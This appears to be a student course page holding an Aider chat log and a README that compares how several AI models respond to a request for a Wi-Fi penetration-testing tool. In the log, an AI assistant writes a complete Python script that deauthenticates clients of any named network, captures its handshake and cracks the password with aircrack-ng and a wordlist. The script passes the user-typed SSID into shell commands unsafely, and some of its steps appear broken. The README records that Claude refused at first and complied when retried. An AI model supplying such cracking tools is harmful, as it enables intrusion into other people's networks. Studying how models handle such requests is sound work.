c2e9d1eec5
# Aider chat conversation:
USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.
This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.
Operations may be run sequentially, or in parallel using multi-threading
As needed, the use of shell tools should utilize sudo capabilities
As needed, the application may utilize a wordlist found at ~/rockyou.txt
As needed, the application can change the state of the users wifi interface between managed and monitor mode
Save this to hw7/claude/app.py
ASSISTANT: Here is the Python application to assist in WiFi penetration testing, saved to hw7/claude/app.py:
hw7/claude/app.py
```python
<<<<<<< SEARCH
=======
import subprocess
import re
def run_command(command):
output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
return output.decode('utf-8')
def change_to_monitor_mode(interface):
run_command(f"sudo airmon-ng start {interface}")
def change_to_managed_mode(interface):
run_command(f"sudo airmon-ng stop {interface}")
def get_wifi_interfaces():
output = run_command("iwconfig")
interfaces = re.findall(r"(\w+)\s+IEEE", output)
return interfaces
def get_target_network(interface):
while True:
target_ssid = input("Enter the SSID of the target network: ")
output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}")
if target_ssid in output:
break
print(f"Network {target_ssid} not found. Please try again.")
return target_ssid
def capture_handshake(target_network, interface):
print(f"Capturing handshake for network {target_network}...")
run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &")
run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}")
run_command("sudo killall airodump-ng")
def crack_password(capture_file, wordlist):
print("Cracking password...")
output = run_command(f"aircrack-ng {capture_file} -w {wordlist}")
password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1)
return password
def main():
interfaces = get_wifi_interfaces()
if len(interfaces) == 0:
print("No WiFi interfaces found.")
return
interface = interfaces[0]
print(f"Using interface {interface}")
change_to_monitor_mode(interface)
target_network = get_target_network(interface)
capture_handshake(target_network, interface)
change_to_managed_mode(interface)
capture_file = "capture-01.cap"
wordlist = "~/rockyou.txt"
password = crack_password(capture_file, wordlist)
print(f"Password for network {target_network} is: {password}")
if __name__ == "__main__":
main()
>>>>>>> REPLACE
```
This application does the following:
1. Gets the available WiFi interfaces using `iwconfig`
2. Prompts the user to enter the SSID of the target network
3. Changes the WiFi interface to monitor mode using `airmon-ng`
4. Captures the handshake for the target network using `airodump-ng` and `aireplay-ng`
5. Changes the WiFi interface back to managed mode
6. Cracks the password using the captured handshake file and a wordlist (`~/rockyou.txt`) with `aircrack-ng`
7. Prints out the cracked password for the target network
It uses `subprocess` to run the shell commands and `re` to parse the output. The WiFi interface is changed between managed and monitor modes as needed.
|
||
|---|---|---|
| .. | ||
| claude | ||
| gemini | ||
| gpt4 | ||
| README.md | ||
| screencast_url.txt | ||
David Westgate 31 May 2024
HW7 for gensec
The purpose of this assignment is to generate a security related application using aider. The application I will attempt to generate is a wifi penetration testing python. The intention is that this application will be able to perform the same wifi cracking that my hw6 LLM application did.
Input
Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.
This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.
Operations may be run sequentially, or in parallel using multi-threading
As needed, the use of shell tools should utilize sudo capabilities
As needed, the application can change the state of the users wifi interface between managed and monitor mode
Save this to hw7/{llm}/app.py
Output - Gemini (gemini 1.5)
There were a few runs of errors, but eventually I was able to get aider to output a program with the gemini LLM
Errors
On the run where code was finally output, we still saw errors. But, we will ignore these for now
Code output
Analysis
Output - GPT4 (gpt40)
A script was generated here on the first try
Errors
Similarly, the code also generated with lint errors, and when prompted, I instructed airder to fix them. However, it did come up with a program on the first try
Code output
Analysis
Output - Claude (claude-opus)
I was able to redeem $5 of free API credits for this test
Errors
On the first shot, claude rejected this ask. On the second try, it gave a program with a nice summary
